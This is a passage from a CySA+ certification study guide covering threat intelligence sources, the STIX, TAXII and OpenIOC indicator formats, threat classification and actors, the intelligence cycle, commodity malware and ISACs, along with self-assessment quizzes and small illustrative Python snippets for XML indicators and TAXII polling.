information listed in each key topic, so you should review these.
Define Key Terms: Although the CySA+ exam might be
unlikely to ask a question such as “Define this term,” the exam
does require that you learn and know a lot of cybersecurity-related terminology. This section lists the most important terms
from the chapter, asking you to write a short definition of each
and compare your answer to the glossary entry at the end of the
book.
Review Questions: Confirm that you understand the content that
you just covered by answering these questions and reading the
answer explanations.
Web-based practice exam: The companion website includes the
Pearson Test Prep practice test software that enables you to take
practice exam questions. Use it to prepare with a sample exam and
to pinpoint topics where you need more study.
WHAT’S NEW?
With every exam update, changes in the relative emphasis on
certain topics can change. Here is an overview of some of the
most important changes:
Increased content on the importance of threat data and intelligence
Increased emphasis on regulatory compliance
Increased emphasis on the options and combinations available for
any given command
Increased emphasis on identifying attacks through log analysis
Increased coverage of cloud security
Increased coverage of forming and using queries
THE COMPANION WEBSITE FOR ONLINE CONTENT
REVIEW
All the electronic review elements, as well as other electronic
components of the book, exist on this book’s companion
website.
To access the companion website, which gives you access to the
electronic content with this book, start by establishing a login at
www.pearsonITcertification.com and register your book.
To do so, simply go to www.pearsonitcertification.com/register
and enter the ISBN of the print book: 9780136747161. After you
have registered your book, go to your account page and click the
Registered Products tab. From there, click the Access
Bonus Content link to get access to the book’s companion
website.
Note that if you buy the Premium Edition eBook and Practice
Test version of this book from Pearson, your book will
automatically be registered on your account page. Simply go to
your account page, click the Registered Products tab, and
select Access Bonus Content to access the book’s companion
website.
Please note that many of our companion content files can be
very large, especially image and video files.
If you are unable to locate the files for this title by following the
steps above, please visit
www.pearsonITcertification.com/contact and select the Site
Problems/Comments option. Our customer service
representatives will assist you.
HOW TO ACCESS THE PEARSON TEST PREP
PRACTICE TEST SOFTWARE
You have two options for installing and using the Pearson Test
Prep practice test software: a web app and a desktop app. To use
the Pearson Test Prep application, start by finding the
registration code that comes with the book. You can find the
code in these ways:
Print book: Look in the cardboard sleeve in the back of the book
for a piece of paper with your book’s unique PTP code.
Premium Edition: If you purchase the Premium Edition eBook
and Practice Test directly from the www.pearsonITcertification.com
website, the code will be populated on your account page after
purchase. Just log in to www.pearsonITcertification.com, click
Account to see details of your account, and click the Digital
Purchases tab.
Amazon Kindle: For those who purchase a Kindle edition from
Amazon, the access code will be supplied directly from Amazon.
Other bookseller e-books: Note that if you purchase an e-book
version from any other source, the practice test is not included
because other vendors to date have not chosen to vend the required
unique access code.
Note
Do not lose the activation code, because it is the only means by which you can
access the QA content that comes with the book.
Once you have the access code, to find instructions about both
the PTP web app and the desktop app, follow these steps:
Step 1. Open this book’s companion website.
Step 2. Click the Practice Exams button.
Step 3. Follow the instructions listed there both for installing
the desktop app and for using the web app.
Note that if you want to use the web app only at this point, just
navigate to www.pearsontestprep.com, establish a free login if
you do not already have one, and register this book’s practice
tests using the registration code you just found. The process
should take only a couple of minutes.
Note
Amazon eBook (Kindle) customers: It is easy to miss Amazon’s e-mail that lists
your PTP access code. Soon after you purchase the Kindle eBook, Amazon
should send an e-mail. However, the e-mail uses very generic text, and makes
no specific mention of PTP or practice exams. To find your code, read every
e-mail from Amazon after you purchase the book. Also do the usual checks to
ensure your e-mail arrives, such as checking your spam folder.
Note
Other eBook customers: As of the time of publication, only the publisher and
Amazon supply PTP access codes when you purchase their eBook editions of
this book.
CUSTOMIZING YOUR EXAMS
Once you are in the exam settings screen, you can choose to take
exams in one of three modes:
Study mode: Enables you to fully customize your exams and
review answers as you are taking the exam. This is typically the
mode you would use first to assess your knowledge and identify
information gaps.
Practice Exam mode: Locks certain customization options, as it
is presenting a realistic exam experience. Use this mode when you
are preparing to test your exam readiness.
Flash Card mode: Strips out the answers and presents you with
only the question stem. This mode is great for late-stage
preparation when you really want to challenge yourself to provide
answers without the benefit of seeing multiple-choice options. This
mode does not provide the detailed score reports that the other two
modes do, so you should not use it if you are trying to identify
knowledge gaps.
In addition to these three modes, you will be able to select the
source of your questions. You can choose to take exams that
cover all of the chapters or you can narrow your selection to just
a single chapter or the chapters that make up specific parts in
the book. All chapters are selected by default. If you want to
narrow your focus to individual chapters, simply deselect all the
chapters and then select only those on which you wish to focus
in the Objectives area.
You can also select the exam banks on which to focus. Each
exam bank comes complete with a full exam of questions that
cover topics in every chapter. You can have the test engine serve
up exams from all test banks or just from one individual bank
by selecting the desired banks in the exam bank area.
There are several other customizations you can make to your
exam from the exam settings screen, such as the time of the
exam, the number of questions served up, whether to
randomize questions and answers, whether to show the number
of correct answers for multiple-answer questions, and whether
to serve up only specific types of questions. You can also create
custom test banks by selecting only questions that you have
marked or questions on which you have added notes.
Updating Your Exams
If you are using the online version of the Pearson Test Prep
software, you should always have access to the latest version of
the software as well as the exam data. If you are using the
Windows desktop version, every time you launch the software
while connected to the Internet, it checks if there are any
updates to your exam data and automatically downloads any
changes that were made since the last time you used the
software.
Sometimes, due to many factors, the exam data might not fully
download when you activate your exam. If you find that figures
or exhibits are missing, you might need to manually update
your exams. To update a particular exam you have already
activated and downloaded, simply click the Tools tab and click
the Update Products button. Again, this is only an issue with
the desktop Windows application.
If you wish to check for updates to the Pearson Test Prep exam
engine software, Windows desktop version, simply click the
Tools tab and click the Update Application button. This
ensures that you are running the latest version of the software
engine.
Credits
Cover image: New Africa/Shutterstock
Chapter opener image: Charlie Edwards/Photodisc/Getty
Images
Figure 3-1 © Greenbone Networks GmbH
Figure 3-2 © Greenbone Networks GmbH
Figure 3-3 © 2020 Tenable, Inc
Figure 3-4 © 2020 Tenable, Inc
Figure 3-5 © 2020 Tenable, Inc
Figure 4-1 © Sarosys LLC 2010-2017
Figure 4-4 © Greenbone Networks GmbH
Figure 4-5 © Greenbone Networks GmbH
Quote, “the process of analyzing a subject system to identify the
system’s components and their interrelationships, and to create
representations of the system in another form or at a higher
level of abstraction” © Institute of Electrical and Electronics
Engineers (IEEE)
Figure 4-7 © Insecure.Com LLC
Figure 4-8 © Insecure.Com LLC
Figure 4-9 © Insecure.Com LLC
Figure 4-10 © Insecure.Com LLC
Figure 4-12 © 2020 KSEC
Figure 4-13 © 2009-2020 Aircrack-ng
Figure 4-14 © hashcat
Figure 4-15 © 2020 HACKING LAND
Figure 5-5 © U.S. Department of Health and Human Services
Figure 11-1 © 2020 Zoho Corp
Figure 11-5 © Microsoft 2020
Figure 11-8 © 2020 SolarWinds Worldwide, LLC
Figure 11-9 © Microsoft 2020
Figure 11-10 © 2020 SolarWinds Worldwide, LLC
Figure 11-11 © Microsoft 2020
Figure 11-13 © 2020 Cloudflare, Inc
Figure 11-14 © Microsoft 2020
Figure 11-15 © 2004-2018 Zentyal S.L.
Figure 11-17 © 1992-2020 Cisco
Figure 11-18 © 1992-2020 Cisco
Figure 11-19 © 2020 Apple Inc
Figure 11-20 © 2020 AT&T CYBERSECURITY
Figure 11-21 © 2005-2020 Splunk Inc.
Figure 13-3 © Microsoft 2020
Figure 13-4 © Microsoft 2020
Figure 17-1 © 2004-2020 Rob Dawson
Figure 17-4 © Microsoft 2020
Figure 17-5 © Microsoft 2020
Figure 18-1 © wireshark
Figure 18-2 © wireshark
Figure 18-3 © wireshark
Figure 18-4 © 2001-2014 Massimiliano Montoro
Figure 18-7 © Microsoft 2020
Figure 19-1 courtesy of Wikipedia
Chapter 1
The Importance of Threat
Data and Intelligence
This chapter covers the following topics related to Objective 1.1
(Explain the importance of threat data and intelligence) of the
CompTIA Cybersecurity Analyst (CySA+) CS0-002 certification
exam:
Intelligence sources: Examines open-source intelligence,
proprietary/closed-source intelligence, timeliness, relevancy, and
accuracy.
Confidence levels: Covers the importance of identifying levels of
confidence in data.
Indicator management: Introduces Structured Threat
Information eXpression (STIX), Trusted Automated eXchange of
Indicator Information (TAXII), and OpenIOC.
Threat classification: Investigates known threats vs. unknown
threats, zero-day threats, and advanced persistent threats.
Threat actors: Identifies actors such as nation-state, hacktivist,
organized crime, and intentional and unintentional insider threats.
Intelligence cycle: Explains the requirements, collection,
analysis, dissemination, and feedback stages.
Commodity malware: Describes the types of malware that
commonly infect networks.
Information sharing and analysis communities: Discusses
data sharing among members of healthcare, financial, aviation,
government, and critical infrastructure communities.
When a war is fought, the gathering and processing of
intelligence information is critical to the success of a campaign.
Likewise, when conducting the daily war that comprises the
defense of an enterprise’s security, threat intelligence can be the
difference between success and failure. This opening chapter
discusses the types of threat intelligence, the sources and
characteristics of such data, and common threat classification
systems. This chapter also discusses the threat cycle, common
malware, and systems of information sharing among
enterprises.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these seven self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 1-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 1-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping

Foundation Topics Section | Question
Intelligence Sources | 1
Indicator Management | 2
Threat Classification | 3
Threat Actors | 4
Intelligence Cycle | 5
Commodity Malware | 6
Information Sharing and Analysis Communities | 7
Caution
The goal of self-assessment is to gauge your mastery of the topics in this
chapter. If you do not know the answer to a question or are only partially sure of
the answer, you should mark that question as wrong for purposes of the
self-assessment. Giving yourself credit for an answer you correctly guess skews
your self-assessment results and might provide you with a false sense of
security.
1. Which of the following is an example of closed-source
intelligence?
1. Internet blogs and discussion groups
2. Print and online media
3. Unclassified government data
4. Platforms maintained by private organizations
2. Which of the following is an application protocol for
exchanging cyber threat information over HTTPS?
1. TAXII
2. STIX
3. OpenIOC
4. OSINT
3. Which of the following are threats discovered in live
environments that have no current fix or patch?
1. Known threats
2. Zero-day threats
3. Unknown threats
4. Advanced persistent threats
4. Which of the following threat actors uses attacks as a means
to get their message out and affect the businesses that they
feel are detrimental to their cause?
1. Organized crime
2. Terrorist group
3. Hacktivist
4. Insider threat
5. In which stage of the intelligence cycle does most of the hard
work occur?
1. Requirements
2. Collection
3. Dissemination
4. Analysis
6. Malware that is widely available for either purchase or by
free download is called what?
1. Advanced
2. Commodity
3. Bulk
4. Proprietary
7. Which of the following information sharing and analysis
communities is driven by the requirements of HIPAA?
1. H-ISAC
2. Financial Services Information Sharing and Analysis Center
3. Aviation Government Coordinating Council
4. ENISA
FOUNDATION TOPICS
INTELLIGENCE SOURCES
Threat intelligence comes in many forms and can be obtained
from a number of different sources. When gathering this critical
data, the security professional should always classify the
information with respect to its timeliness and relevancy. Let’s
look at some types of threat intelligence and the process of
attaching a confidence level to the data.
Open-Source Intelligence
Open-source intelligence (OSINT) consists of information
that is publicly available to everyone, though not everyone
knows that it is available. OSINT comes from public search
engines, social media sites, newspapers, magazine articles, or
any source that does not limit access to that information.
Examples of these sources include the following:
Print and online media
Internet blogs and discussion groups
Unclassified government data
Academic and professional publications
Industry group data
Papers and reports that are unpublished (gray data)
Proprietary/Closed-Source Intelligence
Proprietary/closed-source intelligence sources are those
that are not publicly available and usually require a fee to
access. Examples of these sources are platforms maintained by
private organizations that supply constantly updating
intelligence information. In many cases this data is developed
from all of the provider’s customers and other sources.
An example of such a platform is offered by CYFIRMA, a market
leader in predictive cyber threat visibility and intelligence. In
2019, CYFIRMA announced the launch of its cloud-based Cyber
Intelligence Analytics Platform (CAP) v2.0. Using its proprietary
artificial intelligence and machine learning algorithms, CYFIRMA
helps organizations unravel cyber risks and threats and enables
proactive cyber posture management.
Timeliness
One of the considerations when analyzing intelligence data (of
any kind, not just cyber data) is the timeliness of such data.
Obviously, if an organization receives threat data that is two
weeks old, quite likely it is too late to avoid that threat. One of
the attractions of closed-source intelligence is that these
platforms typically provide near real-time alerts concerning
such threats.
Relevancy
Intelligence data can be quite voluminous. The vast majority of
this information is irrelevant to any specific organization. One
of the jobs of the security professional is to ascertain which data
is relevant and which is not. Again, many proprietary platforms
allow for searching and organizing the data to enhance its
relevancy.
Confidence Levels
While timeliness and relevancy are key characteristics to evaluate
with respect to intelligence, the security professional must also
make an assessment as to the confidence level attached to the
data. That is, can it be relied on to predict the future or to shed
light on the past? On a more basic level, is it true? Or was the
data developed to deceive or mislead? Many cyber activities
have as their aim to confuse, deceive, and hide activities.
Accuracy
Finally, the security professional must determine whether the
intelligence is correct (accuracy). Newspapers are full these
days of cases of false intelligence. The most basic example of
this is the hoax email containing a false warning of a malware
infection on the local device. Although the email is false, in
many cases it motivates the user to follow a link to free software
that actually installs malware. Again, many cyber attacks use
false information to misdirect network defenses.
INDICATOR MANAGEMENT
Cybersecurity professionals use indicators of compromise (IOC)
to identify potential threats. IOCs are network events that are
known to either precede or accompany an attack of some sort.
Managing the collection and analysis of these indicators can be
a major headache. Indicator management systems have
been developed to make this process somewhat easier. These
systems also provide insight into indicators present in other
networks that may not yet be present in your enterprise,
providing somewhat of an early-warning system. Let’s look at
some examples of these platforms.
Structured Threat Information eXpression (STIX)
Structured Threat Information eXpression (STIX) is an
XML-based language that can be used to communicate
cybersecurity data among those using it. It provides a common
language for this communication.
STIX was created with several core purposes in mind:
To identify patterns that could indicate cyber threats
To help facilitate cyber threat response activities, including
prevention, detection, and response
The sharing of cyber threat information within an organization and
with outside partners or communities that benefit from the
information
While STIX was originally sponsored by the Office of
Cybersecurity and Communications (CS&C) within the U.S.
Department of Homeland Security (DHS), it is now under the
management of the Organization for the Advancement of
Structured Information Standards (OASIS), a nonprofit
consortium that seeks to advance the development,
convergence, and adoption of open standards for the Internet.
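To make the idea of an XML-based exchange format concrete, the following minimal Python sketch assembles a simplified, STIX-style indicator using only the standard library. The element names and values here are illustrative placeholders, not the actual STIX schema, which is far richer.

```python
# A minimal sketch of building a simplified, STIX-style XML indicator.
# The element and attribute names below are illustrative only; the real
# STIX 1.x schema is much richer than this.
import xml.etree.ElementTree as ET

indicator = ET.Element("Indicator", attrib={"id": "example-1", "version": "1.2"})
ET.SubElement(indicator, "Title").text = "Suspected botnet C2 domain"
observable = ET.SubElement(indicator, "Observable")
ET.SubElement(observable, "DomainName").text = "bad.example.com"
ET.SubElement(indicator, "Confidence").text = "Medium"

# Serialize to XML so the indicator can be shared in a common format.
print(ET.tostring(indicator, encoding="unicode"))
```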
Trusted Automated eXchange of Indicator Information
(TAXII)
Trusted Automated eXchange of Indicator
Information (TAXII) is an application protocol for
exchanging cyber threat information (CTI) over HTTPS. It
defines two primary services, Collections and Channels. Figure
1-1 shows the Collection service. A Collection is an interface to a
logical repository of CTI objects provided by a TAXII Server that
allows a producer to host a set of CTI data that can be requested
by consumers: TAXII Clients and Servers exchange information
in a request-response model.
Figure 1-1 Collection Service
Figure 1-2 shows a Channel service. Maintained by a TAXII
Server, a Channel allows producers to push data to many
consumers and allows consumers to receive data from many
producers: TAXII Clients exchange information with other
TAXII Clients in a publish-subscribe model.
Figure 1-2 Channel Service
These TAXII services can support a variety of common sharing
models:
Hub and spoke: One central clearinghouse
Source/subscriber: One organization is the single source of
information
Peer-to-peer: Multiple organizations share their information
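As a rough illustration of the request-response model used with Collections, here is a minimal Python sketch of a TAXII client requesting objects over HTTPS. The server URL, API root, collection ID, and credentials are hypothetical; the Accept header shown is the media type defined for TAXII 2.1.

```python
# A minimal sketch of a TAXII client polling a Collection over HTTPS.
# The server URL, API root, collection ID, and credentials are
# hypothetical; the Accept header is the TAXII 2.1 media type.
import requests

BASE = "https://taxii.example.com/api1"               # hypothetical API root
COLLECTION = "91a7b528-80eb-42ed-a74d-c6fbd5a26116"   # hypothetical collection ID

resp = requests.get(
    f"{BASE}/collections/{COLLECTION}/objects/",
    headers={"Accept": "application/taxii+json;version=2.1"},
    auth=("analyst", "password"),                     # most servers require auth
    timeout=30,
)
resp.raise_for_status()

# Each returned object is a piece of CTI (for example, an indicator).
for obj in resp.json().get("objects", []):
    print(obj.get("type"), obj.get("id"))
```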
OpenIOC
OpenIOC (Open Indicators of Compromise) is an open
framework designed for sharing threat intelligence information
in a machine-readable format. It is a simple framework that is
written in XML, which can be used to document and classify
forensic artifacts. It comes with a base set of 500 predefined
indicators, as provided by Mandiant (a U.S. cybersecurity firm
later acquired by FireEye).
THREAT CLASSIFICATION
After threat data has been collected through a vulnerability scan
or through an alert, it must be correlated to an attack type and
classified as to its severity and scope, based on how widespread
the incident appears to be and the types of data that have been
put at risk. This helps in the prioritization process. Much as in
the triage process in a hospital, incidents are not handled in the
order in which they are received or detected; rather, the most
dangerous issues are addressed first, and prioritization occurs
constantly.
When determining vulnerabilities and threats to an asset,
considering the threat actors first is often easiest. Threat actors
can be grouped into the following six categories:
Human: Includes both malicious and nonmalicious insiders and
outsiders, terrorists, spies, and terminated personnel
Natural: Includes floods, fires, tornadoes, hurricanes,
earthquakes, and other natural disasters or weather events
Technical: Includes hardware and software failure, malicious
code, and new technologies
Physical: Includes CCTV issues, perimeter measures failure, and
biometric failure
Environmental: Includes power and other utility failure, traffic
issues, biological warfare, and hazardous material issues (such as
spillage)
Operational: Includes any process or procedure that can affect
confidentiality, integrity, and availability (CIA)
When the vulnerabilities and threats have been identified, the
loss potential for each must be determined. This loss potential is
determined by using the likelihood of the event combined with
the impact that such an event would cause. An event with a high
likelihood and a high impact would be given more importance
than an event with a low likelihood and a low impact. Different
types of risk analysis should be used to ensure that the data that
is obtained is maximized. Once an incident has been placed into
one of these classifications, options that are available for that
classification are considered. The following sections look at
three common classifications that are used.
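As a simple illustration of this prioritization, the following Python sketch approximates loss potential as likelihood multiplied by impact and orders incidents worst-first. The incidents and the 1-to-5 scales are made up for the example.

```python
# A minimal sketch of triage-style prioritization: loss potential is
# approximated as likelihood x impact (both on a made-up 1-5 scale),
# and incidents are handled worst-first rather than first-come.
incidents = [
    {"name": "Phishing e-mail reported", "likelihood": 4, "impact": 2},
    {"name": "Ransomware on file server", "likelihood": 3, "impact": 5},
    {"name": "Port scan from Internet",  "likelihood": 5, "impact": 1},
]

for inc in sorted(incidents, key=lambda i: i["likelihood"] * i["impact"], reverse=True):
    score = inc["likelihood"] * inc["impact"]
    print(f'{score:>2}  {inc["name"]}')
```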
Known Threat vs. Unknown Threat
In the cybersecurity field, known threats are threats that are
common knowledge and easily identified through signatures by
antivirus and intrusion detection system (IDS) engines or
through domain reputation blacklists. Unknown threats, on
the other hand, are lurking threats that may have been
identified but for which no signatures are available. We are not
completely powerless against these threats. Many security
products attempt to locate these threats through static and
dynamic file analysis. This may occur in a sandboxed
environment, which protects the system that is performing the
analysis. In some cases, unknown threats are really old threats
that have been recycled. Because security products have limited
memory with regard to threat signatures, vendors must choose
the most current attack signatures to include. Therefore, old
attack signatures may be missing in newer products, which
effectively allows old known threats to reenter the unknown
category.
Zero-day
In many cases, vulnerabilities discovered in live environments
have no current fix or patch. Such a vulnerability is referred to
as a zero-day vulnerability. The best way to prevent zero-day
attacks is to write bug-free applications by implementing
efficient designing, coding, and testing practices. Having staff
discover zero-day vulnerabilities is much better than having
those looking to exploit the vulnerabilities find them.
Monitoring known hacking community websites can often help
you detect attacks early because hackers often share zero-day
exploit information.
Honeypots or honeynets can also provide forensic information
about hacker methods and tools for zero-day attacks. New zero-day
attacks against a broad range of technology systems are
announced on a regular basis. A security manager should create
an inventory of applications and maintain a list of critical
systems to manage the risks of these attack vectors.
Because zero-day attacks occur before a fix or patch has been
released, preventing them is difficult. As with many other
attacks, keeping all software and firmware up to date with the
latest updates and patches is important. Enabling audit logging
of network traffic can help reconstruct the path of a zero-day
attack. Security professionals can inspect logs to determine the
presence of an attack in the network, estimate the damage, and
identify corrective actions. Zero-day attacks usually involve
activity that is outside “normal” activity, so documenting
normal activity baselines is important. Also, routing traffic
through a central internal security service can ensure that any
fixes affect all the traffic in the most effective manner.
Whitelisting can also aid in mitigating attacks by ensuring that
only approved entities are able to use certain applications or
complete certain tasks. Finally, security professionals should
ensure that the organization implements the appropriate
backup schemes to ensure that recovery can be achieved,
thereby providing remediation from the attack.
Advanced Persistent Threat
An advanced persistent threat (APT) is a hacking process
that targets a specific entity and is carried out over a long period
of time. In most cases, the victim of an APT is a large
corporation or government entity. The attacker is usually an
organized, well-funded group of highly skilled individuals,
sometimes sponsored by a nation-state. The attackers have a
predefined objective. Once the objective is met, the attack is
halted. APTs can often be detected by monitoring logs and
performance metrics. While no defensive actions are 100%
effective, the following actions may help mitigate many APTs:
Use application whitelisting to help prevent malicious software and
unapproved programs from running.
Patch applications such as Java, PDF viewers, Flash, web browsers,
and Microsoft Office products.
Patch operating system vulnerabilities.
Restrict administrative privileges to operating systems and
applications, based on user duties.
THREAT ACTORS
A threat is carried out by a threat actor. For example, an
attacker who takes advantage of an inappropriate or absent
access control list (ACL) is a threat actor. Keep in mind, though,
that threat actors can discover and/or exploit vulnerabilities.
Not all threat actors will actually exploit an identified
vulnerability.
The Federal Bureau of Investigation (FBI) has identified three
categories of threat actors: nation-state or state sponsors,
organized crime, and terrorist groups.
Nation-state
Nation-state or state sponsors are usually foreign governments.
They are interested in pilfering data, including intellectual
property and research and development data, from major
manufacturers, tech companies, government agencies, and
defense contractors. They have the most resources and are the
best organized of any of the threat actor groups.
Organized Crime
Organized crime groups primarily threaten the financial
services sector and are expanding the scope of their attacks.
They are well financed and organized.
Terrorist Groups
Terrorist groups want to impact countries by using the Internet
and other networks to disrupt or harm the viability of a society
by damaging its critical infrastructure.
Hacktivist
While not mentioned by the FBI, hacktivists are activists for a
cause, such as animal rights, that use hacking as a means to get
their message out and affect the businesses that they feel are
detrimental to their cause.
Insider Threat
Insider threats should be one of the biggest concerns for
security personnel. Insiders have knowledge of and access to
systems that outsiders do not have, giving insiders a much
easier avenue for carrying out or participating in an attack. An
organization should implement the appropriate event collection
and log review policies to provide the means to detect insider
threats as they occur. These threats fall into two categories,
intentional and unintentional.
Intentional
Intentional insider threats are insiders who have ill intent.
These folks typically either are disgruntled over some perceived
slight or are working for another organization to perform
corporate espionage. They may share sensitive documents with
others or they may impart knowledge used to breach a network.
This is one of the reasons that users’ permissions and rights
must not exceed those necessary to perform their jobs. This
helps to limit the damage an insider might inflict.
Unintentional
Sometimes internal users unknowingly increase the likelihood
that security breaches will occur. Such unintentional insider
threats do not have malicious intent; they simply do not
understand how system changes can affect security.
Security awareness and training should include coverage of
examples of misconfigurations that can result in security
breaches occurring and/or not being detected. For example, a
user may temporarily disable antivirus software to perform an
administrative task. If the user fails to reenable the antivirus
software, he unknowingly leaves the system open to viruses. In
such a case, an organization should consider implementing
group policies or some other mechanism to periodically ensure
that antivirus software is enabled and running. Another
solution could be to configure antivirus software to
automatically restart after a certain amount of time.
Recording and reviewing user actions via system, audit, and
security logs can help security professionals identify
misconfigurations so that the appropriate policies and controls
can be implemented.
INTELLIGENCE CYCLE
Intelligence activities of any sort, including cyber intelligence
functions, should follow a logical process developed over years
by those in the business. The intelligence cycle model specified
in exam objective 1.1 contains five stages:
1. Requirements: Before beginning intelligence activities, security
professionals must identify what the immediate issue is and define
as closely as possible the requirements of the information that
needs to be collected and analyzed. This means the types of data to
be sought are driven by the types of issues with which we are
concerned. The amount of potential information may be so vast
that unless we filter it to what is relevant, we may be unable to fully
understand what is occurring in the environment.
2. Collection: This is the stage in which most of the hard work
occurs. It is also the stage at which recent advances in artificial
intelligence (AI) and automation have changed the game. Collection
is time-consuming work that involves web searches, interviews,
identifying sources, and monitoring, to name a few activities. New
tools automate data searching, organizing, and presenting
information in easy-to-view dashboards.
3. Analysis: In this stage, data is combed and analyzed to identify
pieces of information that have the following characteristics:
1. Timely: Can be tied to the issue from a time standpoint
2. Actionable: Suggests or leads to a proper mitigation
3. Consistent: Reduces uncertainty surrounding an issue
This is the stage in which the skills of the security professional have
the most impact, because the ability to correlate data with issues
requires keen understanding of vulnerabilities, their symptoms,
and solutions.
4. Dissemination: Hopefully analysis leads to a solution or set of
solutions designed to prevent issues. These solutions, be they
policies, scripts, or configuration changes, must be communicated
to the proper personnel for deployment. The security professional
acts as the designer and the network team acts as the builder of the
solution. In the case of policy changes, the human resources (HR)
team acts as the builder.
5. Feedback: Gathering feedback on the intelligence cycle before the
next cycle begins is important so that improvements can be defined.
What went right? What worked? What didn’t? Was the analysis
stage performed correctly? Was the dissemination process clear
and timely? Improvements can almost always be identified.
COMMODITY MALWARE
Commodity malware is malware that is widely available
either for purchase or by free download. It is not customized or
tailored to a specific attack. It does not require complete
understanding of its processes and is used by a wide range of
threat actors with a range of skill levels. Although no clear
dividing line exists between commodity malware and what is
called advanced malware (and in fact the lines are blurring
more all the time), generally we can make a distinction based on
the skill level and motives of the threat actors who use the
malware. Less-skilled threat actors (script kiddies, etc.) utilize
these prepackaged commodity tools, whereas more-skilled
threat actors (APTs, etc.) typically customize their attack tools
to make them more effective in a specific environment. The
motives of those who employ commodity malware tend to be
gaining experience in hacking and experimentation.
INFORMATION SHARING AND ANALYSIS
COMMUNITIES
Over time, security professionals have developed methods and
platforms for sharing the cybersecurity information they have
developed. Some information sharing and analysis communities
focus on specific industries while others simply focus on critical
issues common to all:
Healthcare: In the healthcare community, where protection of
patient data is legally required by the Health Insurance Portability
and Accountability Act (HIPAA), an example of a sharing platform
is the Health Information Sharing and Analysis Center (H-ISAC). It
is a global operation focused on sharing timely, actionable, and
relevant information among its members, including intelligence on
threats, incidents, and vulnerabilities. This sharing of information
can be done on a human-to-human or machine-to-machine basis.
Financial: The financial services sector is under pressure to
protect financial records with laws such as the Financial Services
Modernization Act of 1999, commonly known as the Gramm-Leach-Bliley
Act (GLBA). The Financial Services Information Sharing and
Analysis Center (FS-ISAC) is an industry consortium dedicated to
reducing cyber risk in the global financial system. It shares among
its members and trusted sources critical cyber intelligence, and
builds awareness through summits, meetings, webinars, and
communities of interest.
Aviation: In the area of aviation, the U.S. Department of
Homeland Security’s Cybersecurity and Infrastructure Security
Agency (CISA) maintains a number of chartered organizations,
among them the Aviation Government Coordinating Council
(AGCC). Its charter document reads “The AGCC coordinates
strategies, activities, policy and communications across government
entities within the Aviation Sub-Sector. The AGCC acts as the
government counterpart to the private industry-led ‘Aviation Sector
Coordinating Council’ (ASCC).” The Aviation Sector Coordinating
Council is an example of a private sector counterpart.
Government: For government agencies, the aforementioned CISA
also shares information with state, local, tribal, and territorial
governments and with international partners, as cybersecurity
threat actors are not constrained by geographic boundaries. As
CISA describes itself on the Department of Homeland Security
website, “CISA is the Nation’s risk advisor, working with partners to
defend against today’s threats and collaborating to build more
secure and resilient infrastructure for the future.”
Critical infrastructure: All of the previously mentioned
platforms and organizations are dedicated to helping organizations
protect their critical infrastructure. As an example of international
cooperation, the European Union Agency for Network and
Information Security (ENISA) is a center of network and
information security expertise for the European Union (EU). ENISA
describes itself as follows: “ENISA works with these groups to
develop advice and recommendations on good practice in
information security. It assists member states in implementing
relevant EU legislation and works to improve the resilience of
Europe’s critical information infrastructure and networks. ENISA
seeks to enhance existing expertise in member states by supporting
the development of cross-border communities committed to
improving network and information security throughout the EU.”
More information about ENISA and its work can be found at
https://www.enisa.europa.eu.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 1-2
lists a reference of these key topics and the page number on
which each is found.
Table 1-2 Key Topics in Chapter 1

Key Topic Element | Description | Page Number
Section | Open-source intelligence | 6
Section | Closed-source intelligence | 6
Section | Indicator management platforms | 7
Section | Threat actors | 12
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
open-source intelligence
proprietary/closed-source intelligence
timeliness
relevancy
confidence levels
accuracy
indicator management
Structured Threat Information eXpression (STIX)
Trusted Automated eXchange of Indicator Information
(TAXII)
OpenIOC
known threats
unknown threats
zero-day threats
advanced persistent threat
collection
analysis
dissemination
commodity malware
REVIEW QUESTIONS
1. Give at least two examples of open-source intelligence data.
2. ________________ is an open framework that is
designed for sharing threat intelligence information in a
machine-readable format.
3. Match the following items with the correct definition.

Items:
OpenIOC
STIX
Cyber Intelligence Analytics Platform (CAP) v2.0

Definitions:
An XML-based language that can be used to communicate cybersecurity data among those using the language.
Uses its proprietary artificial intelligence and machine learning algorithms to help organizations unravel cyber risks and threats and enables proactive cyber posture management.
An open framework that is designed for sharing threat intelligence information in a machine-readable format.
4. Which threat actor has already performed network
penetration?
5. List the common sharing models used in TAXII.
6. ________________ are hacking for a cause, such as for
animal rights, and use hacking as a means to get their
message out and affect the businesses that they feel are
detrimental to their cause.
7. Match the following items with their definition.

Items:
Zero-day
APT
Terrorist

Definitions:
Threat carried out over a long period of time
Threat with no known solution
Hacks not for monetary gain but simply to destroy or deface
8. APT attacks are typically sourced from which group of
threat actors?
9. What intelligence gathering step is necessary because the
amount of potential information may be so vast?
10. The Aviation Government Coordinating Council is
chartered by which organization?
Chapter 2
Utilizing Threat
Intelligence to Support
Organizational Security
This chapter covers the following topics related to Objective 1.2
(Given a scenario, utilize threat intelligence to support
organizational security) of the CompTIA Cybersecurity Analyst
(CySA+) CS0-002 certification exam:
Attack frameworks: Introduces the MITRE ATT&CK framework,
the Diamond Model of Intrusion Analysis, and the kill chain.
Threat research: Covers reputational and behavioral research,
indicators of compromise (IoC), and the Common Vulnerability
Scoring System (CVSS).
Threat modeling methodologies: Discusses the concepts of
adversary capability, total attack surface, attack vector, impact, and
likelihood.
Threat intelligence sharing with supported functions:
Describes intelligence sharing with the functions incident response,
vulnerability management, risk management, security engineering,
and detection and monitoring.
Threat intelligence comprises information gathered that does
one of the following things:
Educates and warns you about potential dangers not yet seen in the
environment
Identifies behavior that accompanies malicious activity
Alerts you of ongoing malicious activity
However, possessing threat intelligence is of no use if it is not
converted into concrete activity that responds to and mitigates
issues. This chapter discusses how to utilize threat intelligence
to support organizational security.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
